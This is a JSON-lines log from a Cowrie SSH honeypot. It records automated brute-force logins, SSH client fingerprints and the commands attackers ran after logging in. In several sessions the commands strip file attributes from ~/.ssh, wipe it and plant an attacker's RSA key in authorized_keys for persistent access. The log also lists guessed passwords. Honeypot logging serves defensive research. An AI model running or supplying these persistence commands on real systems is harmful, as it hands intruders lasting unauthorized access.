{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T00:26:38.776736Z","src_ip":"212.227.235.229","session":"dd44ee60ba4d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:26:39.352407Z","src_ip":"24.108.102.132","session":"966aa1997a42"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:26:40.524363Z","src_ip":"24.108.102.132","session":"966aa1997a42"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":44760,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e8c74333275","protocol":"ssh","message":"New connection: 24.108.102.132:44760 (1.2.3.4:22) [session: 0e8c74333275]","sensor":"my-vps","timestamp":"2025-08-26T00:26:40.675579Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:26:40.680730Z","src_ip":"24.108.102.132","session":"0e8c74333275"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:26:40.848573Z","src_ip":"24.108.102.132","session":"0e8c74333275"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:26:41.520028Z","src_ip":"24.108.102.132","session":"0e8c74333275"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:26:41.688019Z","src_ip":"24.108.102.132","session":"0e8c74333275"}
{"eventid":"cowrie.session.closed","duration":"5.3","message":"Connection lost after 5.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:26:41.691185Z","src_ip":"24.108.102.132","session":"e11518a2a94b"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":48970,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce4ec1661560","protocol":"ssh","message":"New connection: 36.89.28.139:48970 (1.2.3.4:22) [session: ce4ec1661560]","sensor":"my-vps","timestamp":"2025-08-26T00:26:42.109810Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:26:42.110605Z","src_ip":"36.89.28.139","session":"ce4ec1661560"}
{"eventid":"cowrie.login.success","username":"root","password":"123456654321","message":"login attempt [root/123456654321] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:26:42.255898Z","src_ip":"212.227.235.229","session":"dd44ee60ba4d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:26:42.292629Z","src_ip":"36.89.28.139","session":"ce4ec1661560"}
{"eventid":"cowrie.login.failed","username":"sharon","password":"sharon123","message":"login attempt [sharon/sharon123] failed","sensor":"my-vps","timestamp":"2025-08-26T00:26:43.059968Z","src_ip":"36.89.28.139","session":"ce4ec1661560"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:26:44.143229Z","src_ip":"212.227.235.229","session":"dd44ee60ba4d"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:26:44.244968Z","src_ip":"36.89.28.139","session":"ce4ec1661560"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":37688,"dst_ip":"1.2.3.4","dst_port":22,"session":"91c9ec5429fa","protocol":"ssh","message":"New connection: 27.112.78.245:37688 (1.2.3.4:22) [session: 91c9ec5429fa]","sensor":"my-vps","timestamp":"2025-08-26T00:27:03.097958Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:27:03.098715Z","src_ip":"27.112.78.245","session":"91c9ec5429fa"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:27:03.363619Z","src_ip":"27.112.78.245","session":"91c9ec5429fa"}
{"eventid":"cowrie.login.success","username":"root","password":"d41d8cd98f00b204e9800998ecf8427e","message":"login attempt [root/d41d8cd98f00b204e9800998ecf8427e] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:27:04.468423Z","src_ip":"27.112.78.245","session":"91c9ec5429fa"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:27:05.047148Z","src_ip":"27.112.78.245","session":"91c9ec5429fa"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:27:05.047803Z","src_ip":"27.112.78.245","session":"91c9ec5429fa"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:27:05.048978Z","src_ip":"27.112.78.245","session":"91c9ec5429fa"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:27:05.314910Z","src_ip":"27.112.78.245","session":"91c9ec5429fa"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:27:05.896240Z","src_ip":"27.112.78.245","session":"91c9ec5429fa"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:27:05.897015Z","src_ip":"27.112.78.245","session":"91c9ec5429fa"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:27:06.589557Z","src_ip":"27.112.78.245","session":"91c9ec5429fa"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:27:06.590505Z","src_ip":"27.112.78.245","session":"91c9ec5429fa"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":55274,"dst_ip":"1.2.3.4","dst_port":22,"session":"409c1d17040e","protocol":"ssh","message":"New connection: 27.112.78.245:55274 (1.2.3.4:22) [session: 409c1d17040e]","sensor":"my-vps","timestamp":"2025-08-26T00:27:06.880470Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:27:06.881197Z","src_ip":"27.112.78.245","session":"409c1d17040e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:27:07.149629Z","src_ip":"27.112.78.245","session":"409c1d17040e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:27:08.264390Z","src_ip":"27.112.78.245","session":"409c1d17040e"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:27:09.534522Z","src_ip":"27.112.78.245","session":"409c1d17040e"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":55280,"dst_ip":"1.2.3.4","dst_port":22,"session":"0d514d8b966f","protocol":"ssh","message":"New connection: 27.112.78.245:55280 (1.2.3.4:22) [session: 0d514d8b966f]","sensor":"my-vps","timestamp":"2025-08-26T00:27:09.792706Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:27:09.793616Z","src_ip":"27.112.78.245","session":"0d514d8b966f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:27:10.052918Z","src_ip":"27.112.78.245","session":"0d514d8b966f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:27:11.131517Z","src_ip":"27.112.78.245","session":"0d514d8b966f"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:27:11.393198Z","src_ip":"27.112.78.245","session":"0d514d8b966f"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:27:11.394039Z","src_ip":"27.112.78.245","session":"91c9ec5429fa"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":37932,"dst_ip":"1.2.3.4","dst_port":22,"session":"9a3db9c9043f","protocol":"ssh","message":"New connection: 45.159.112.103:37932 (1.2.3.4:22) [session: 9a3db9c9043f]","sensor":"my-vps","timestamp":"2025-08-26T00:27:20.095343Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:27:20.096275Z","src_ip":"45.159.112.103","session":"9a3db9c9043f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:27:20.205671Z","src_ip":"45.159.112.103","session":"9a3db9c9043f"}
{"eventid":"cowrie.login.success","username":"root","password":"Ab@123","message":"login attempt [root/Ab@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:27:20.684015Z","src_ip":"45.159.112.103","session":"9a3db9c9043f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:27:20.922909Z","src_ip":"45.159.112.103","session":"9a3db9c9043f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:27:20.923584Z","src_ip":"45.159.112.103","session":"9a3db9c9043f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:27:20.924539Z","src_ip":"45.159.112.103","session":"9a3db9c9043f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:27:21.034618Z","src_ip":"45.159.112.103","session":"9a3db9c9043f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:27:21.354357Z","src_ip":"45.159.112.103","session":"9a3db9c9043f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:27:21.355108Z","src_ip":"45.159.112.103","session":"9a3db9c9043f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:27:21.466241Z","src_ip":"45.159.112.103","session":"9a3db9c9043f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:27:21.467151Z","src_ip":"45.159.112.103","session":"9a3db9c9043f"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":37934,"dst_ip":"1.2.3.4","dst_port":22,"session":"2bd649b5d1fe","protocol":"ssh","message":"New connection: 45.159.112.103:37934 (1.2.3.4:22) [session: 2bd649b5d1fe]","sensor":"my-vps","timestamp":"2025-08-26T00:27:21.563146Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:27:21.564112Z","src_ip":"45.159.112.103","session":"2bd649b5d1fe"}
